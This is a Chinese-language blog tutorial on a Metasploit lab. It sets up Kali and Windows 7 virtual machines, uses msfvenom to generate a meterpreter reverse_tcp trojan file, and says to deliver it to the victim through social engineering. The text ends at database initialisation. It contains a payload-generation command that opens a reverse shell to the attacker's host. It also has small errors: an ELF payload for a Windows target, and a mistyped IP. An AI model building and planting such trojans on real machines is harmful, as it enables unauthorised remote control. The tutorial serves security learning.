一、背景介绍
Metasploit就是一个网络安全框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木码控制受害者主机呢?接下来让我们一起学习!
二、资源装备
1.安装好的Linux虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
三、安全演练
3.1 将受害者主机(Windows7)跟控制者主机(Kali Linux)的网络模式全部设置为NAT模式,如下图所示。
步骤:打开虚拟机的设置/选择网络适配器/选择NAT模式。
3.2 查看实验的两台主机的IP地址,如下图所示。
命令:ifconfig
3.3 利用命令查看控制者主机跟受害者主机是否可以互相通信,如下图所示。
命令:ping IP
例子:ping 192.168.78.162
3.4 利用“msfvenom”木码生成工具生成对应的木码文件,如下图所示。
步骤1:msfvenom工具的参数介绍
-p, –payload < payload> 指定需要使用的payload荷载。也可以使用自定义payload,几乎是支持全平台的
-o, –out < path> 指定创建好的payload的存放位置。
-h, –help 查看帮助选项。
步骤2:利用msfvenom工具生成对应的木码文件,如下图所示。
命令:msfvenom -p 指定需要使用的payload荷载 lhost=控制者主机IP -f exe > 生成木码文件的保存位置
例子:msfVenom -p linux/meterpreter/reverse_tcp lhost=192.168.78.l69 -f elf > /root/hk.elf
步骤3:在已知的木码文件保存路径目录下查找对应的木码文件是否已经生成,如下图所示,木码文件已经存在(这里使用图形化文件管理系统来查看,你也可以利用ls命令查看对应路径下面是否已经生成对应的木码文件)。
3.5 利用一定的社会工程学方法将生成的木码文件发送到目标受害者主机,并且在受害者主机进行运行(对应的社会工程学知识请持续关注本号,后续讲解)
3.6 查看受害者主机是否已经存在对应的木码文件,如下图所示。
命令:ls
3.7 查看postgresql数据库服务是否开启,如下图所示。
命令:service postgresql status
3.8 开启postgresql数据库服务,如下图所示。
命令:service postgresql start
3.9 初始化postgresql数据库,如下图所示。
命令:msfdb init
点我学习专业的Kali Linux安全技术
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
